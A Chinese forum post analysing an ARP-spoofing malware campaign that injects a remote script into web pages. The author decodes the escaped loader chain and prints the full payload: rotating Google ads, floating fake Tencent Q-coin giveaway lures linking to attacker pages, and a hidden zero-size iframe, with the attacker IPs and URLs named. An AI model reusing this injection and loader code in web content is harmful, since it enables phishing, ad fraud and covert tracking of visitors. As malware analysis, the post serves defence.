又一个ARP病毒,带GG广告和百万q币大放送的仿腾讯
最主要的特征是在网页第一行有<script src=http://121.11.245.180/1.js></script> 的脚本..
我们看一下具体的图
打开上边那个1.js,可以发现有经下内容
document.write(unescape(’%3Cscript%3E%0D%0A%0D%0Adocument.writeln%28%22%3Cscript%20type%3D%5C%22text%5C/javascript%5C%22%20src%20%3D%20%5C%22http%3A%5C/%5C/121.15.245.60%5C/oo.asp%5C%22%3E%3C%5C/script%3E%22%29%0D%0A%0D%0A%3C/script%3E’))
注意,还是unescape过的,我们解密一下,看到
document.write(unescape(’<script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/oo.asp\”><\/script>”)
</script>’))
我们打开http://121.15.245.60/oo.asp 可以看到源码是
<script src=http://121.11.245.180/1.js></script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/ooo.js\”><\/script>”)
上边那个我们见过了,看下边的..下载,打开
document.writeln(”<center>”);
window.onerror = function (){return true};
function hgbrand(a)
{
return parseInt((a)*Math.random()+1);
}
function hgbvclosew(a,b)
{
document.getElementById(a).location=’about:blank’;
document.getElementById(b).innerHTML=”";
}
优文网络提醒您,上边这个innerHTML=”";用的是动态插入,所以你看到的广告或其他的是不同的..
var hgbnumTemp;
hgbnumTemp=hgbrand(6);
if (hgbnumTemp==1)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==2)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==3)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==4)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}
if (hgbnumTemp==5)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
///这几个是GG广告,发布者ID pub-6651899251830388, 不知是病毒作者的还是有意要陷害其他人的..
document.writeln(”<div id=\”adid\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/play.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/jq5.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadid1dfas23()\”,200);function runadid1dfas23(){document.all.adid.style.top=document.body.scrollTop+document.body.clientHeight-159;document.all.adid.style.left=document.body.scrollLeft +document.body.clientWidth-256}<\/script>”)
}
///这个就是下边那个仿QQ的代码..
if (hgbnumTemp==6)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(” src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
///这个也是GG广告,同上
document.writeln(”<div id=\”adidd\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/qq.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/qq2.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadidd1dfas23()\”,200);function runadidd1dfas23(){document.all.adidd.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.adidd.style.left=document.body.scrollLeft +document.body.clientWidth-209}<\/script>”)
}
///这个也是下边那个仿QQ的代码..
document.writeln(”<iframe src=\”http:\/\/w.c0mo.com\/1.htm\” width=\”0\” height=\”0\”><\/iframe>”);
document.writeln(”</center>”);
注意上边这个ifame,打开,原来是个统计代码,这病毒作者也是分析专家呀..代码如下
<script src=’http://s119.cnzz.com/stat.php?id=675882&web_id=675882&show=pic1′ language=’JavaScript’ charset=’gb2312′></script>
以上就是代码的具体分析 |
[复制链接]
发表于 2007-12-2 01:27:33
楼主
控制自己的鼠标 汗
